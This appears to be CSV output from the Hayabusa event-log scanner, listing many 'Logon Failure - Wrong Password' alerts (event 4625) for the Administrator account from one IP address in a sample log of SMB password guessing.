NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:10.969 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: U9slFFSSXhFxPqG1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:11.009 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YDb5Up4KwJj0hN5n | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:11.063 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DxqIpDLlnf6Xyc34 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:11.106 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rTCTTYmKTIzzJwxH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:11.145 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oD3dLxlB3qWIhZEQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:11.193 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Fe9xMOoCxPJIIyVq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:11.246 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DW3YgBZYiGTeEw66 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:11.293 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VAKeeIcOeiQ3H9NF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:11.338 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nmF3ot3gJCsBlSwF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:11.395 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wDjoResfZvvVqqE5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:11.437 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: V4dwzMwvVtzztGwr | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:11.491 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0qklApBFOMxVzucD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:11.538 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0IJSphtLB3eNARBo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:11.582 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PLOFe4w5KpJ2UaGM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:11.620 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cF3JTWkGadY1fJE2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:11.666 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kyTH0jxSZB2YVdhW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:11.709 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NRq5XrcDkFvabCzh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:11.750 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zlYwlgrsMy1kSgEC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:11.790 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AchwW4ifbZ41AQNg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:11.842 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1PaxF7Q8ue1Kex1h | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:11.888 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WAhW2PErXdwNVrx5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:11.943 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LoAV3ESqieev2JMC | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:12.012 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wFlWFijaFirgsAtJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:12.049 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hSDjuqvzKLaWCWVo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:12.109 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SL0CVu787iFRLiPU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:12.219 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZQDORN33izpv4tGO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:12.253 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: v470yorD43fgGyjC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:12.305 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LBbLWVZFDqFxb7dW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:12.360 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RJsowt9MrhXciLOZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:12.404 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uhCVFyMmDI5shASV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:12.452 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yd4SM9EGM7cnO6Z5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:12.490 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PSR1tbtzdDaJDbXs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:12.538 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rNqyjBuN0Pq6WRO1 | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:12.585 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vqpMAmE9OvHbFCh2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:12.632 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JfLQAaB0DPvxWQMB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:12.676 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: A0kvHMwnj2k0HMLQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:12.712 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kPqfVDftcR4iRDaw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:12.748 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1bltwm2g13InAJM6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:12.788 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: J2iFr8ppe5NzukXF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:12.842 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7EEUOBohBFRze6hL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:12.887 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NCOFn3WM71KmaZyB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:12.928 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UdUkBxB1auduRfdS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:12.980 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: E2JaWoYK56HRGfW1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:13.015 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: a3JTCX9NIOpg6TFB | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:13.064 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zFGkdUVAdKcrrREB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:13.108 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7oZW00FpKema01Vw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:13.151 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: p4HbNQx0Acf83b1h | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:13.196 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: j9aM5UCQbOLvcpI0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:13.238 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BGGChEAIdej9lBhr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:13.288 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4CaFYB1ImWAWbH0W | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:13.320 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OLa3lkxWiJ00raQh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:13.364 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vMzyi0jIVLNrodC8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:13.409 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: n2repX0roAP2j0TI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:13.460 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gqcpIjdkNpmoTe4A | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:13.488 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Edgo9UdNvmMJpiyn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:13.532 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LpqOTu7Xn7ULipmN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:13.567 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TP0efL79STMbuu9g | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:13.610 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HkwWfRi0E5sVY6UT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:13.657 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IkyCe9NXGExCQS5r | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:13.698 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IGnhRwa7P7by9vJO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:13.740 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fh7IGliNbSyKwxpM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:13.782 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1QfgWsAqSYQfB9l5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:13.821 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q8VM66P8Vluf7yrL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:13.861 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cdYiwh3QjdA0Zoge | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:13.904 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ou3FPUI5bFcUvuFC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:13.952 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bMUg8N7apFtUgX9d | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:13.991 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: U7Cn4n7jQAQaxP6y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:14.024 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: urflPvd1vgYYi2ra | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:14.081 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pqFtTDD69fNTKROG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:14.113 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: teUZYpNyqJ64Dgcz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:14.152 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9kaKSy3DV5fRKvTc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:14.196 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gtiZUzpwrnuWIjna | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:14.238 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SD9UhsShNJRp251r | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:14.288 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: C5xbL7aO0azgBxfz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
